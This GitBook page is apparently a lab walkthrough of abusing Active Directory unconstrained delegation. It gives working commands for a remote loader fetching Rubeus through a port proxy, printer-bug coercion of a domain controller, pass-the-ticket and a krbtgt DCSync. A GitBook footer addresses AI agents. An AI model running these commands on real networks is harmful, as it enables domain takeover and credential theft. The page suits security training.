> For the complete documentation index, see [llms.txt](https://omar-4.gitbook.io/omar-docs/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://omar-4.gitbook.io/omar-docs/attacks/unconstrained-delegation.md).

# Unconstrained Delegation

#### How Unconstrained Delegation Works

In an Active Directory environment, **delegation** allows one service (or server) to act on behalf of a user to access other resources, enabling scenarios where a user authenticates to a service, and that service can then use the user's credentials to authenticate to other services.

With **unconstrained delegation**, the domain trusts the service (or server) completely, allowing it to impersonate any user that authenticates to it. When a user authenticates to a service configured with unconstrained delegation, their **Kerberos Ticket-Granting Ticket (TGT)** is stored in memory on the service. This means the service can impersonate the user at will for any resource across the domain by using the TGT.

```
c:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
```

```
. C:\AD\Tools\PowerView.ps1
```

```
Get-DomainComputer -Unconstrained | select -ExpandProperty name
```

Since the prerequisite for elevation using Unconstrained delegation is having admin access to the machine, we need to compromise a user which has local admin access on appsrv. Recall that we extracted secrets of appadmin, srvadmin and websvc from dcorp-adminsrv. Let's check if anyone of them have local admin privileges on dcorp-appsrv.

First, we will try with appadmin. Run the below command from an elevated command prompt:

```
 c:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
```

```
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
```

```
Find-PSRemotingLocalAdminAccess -Domain dollarcorp.moneycorp.local
```

Sweet! We can use multiple methods now to copy Rubeus to dcorp-appsrv to abuse Printer Bug!

Printer Bug - Execute Rubeus using Loader and winrs Run the below command from the process running appadmin:

```
Copy echo F | xcopy C:\AD\Tools\Loader.exe \dcorp-appsrv\C$\Users\Public\Loader.exe /Y
```

```
winrs -r:dcorp-appsrv cmd
```

```
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.X
```

```
c:\Users\Public\Loader.exe -path http://127.0.0.1:8080/Rubeus.exe monitor /targetuser:MCORP-DC$ /interval:5 /nowrap
```

On the student VM, use MS-RPRN to force authentication from dcorp-dc$

```
C:\AD\Tools\MS-RPRN.exe \dcorp-dc.dollarcorp.moneycorp.local \dcorp-appsrv.dollarcorp.moneycorp.local
```

Copy the base64 encoded ticket and use it with Rubeus on student VM. Run the below command from an elevated shell as the SafetyKatz command that we will use for DCSync needs to be run from an elevated process:

```
C:\AD\Tools\Rubeus.exe -ptt /ticket:doIFx...
```

Now, we can run DCSync from this process:

```
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://omar-4.gitbook.io/omar-docs/attacks/unconstrained-delegation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
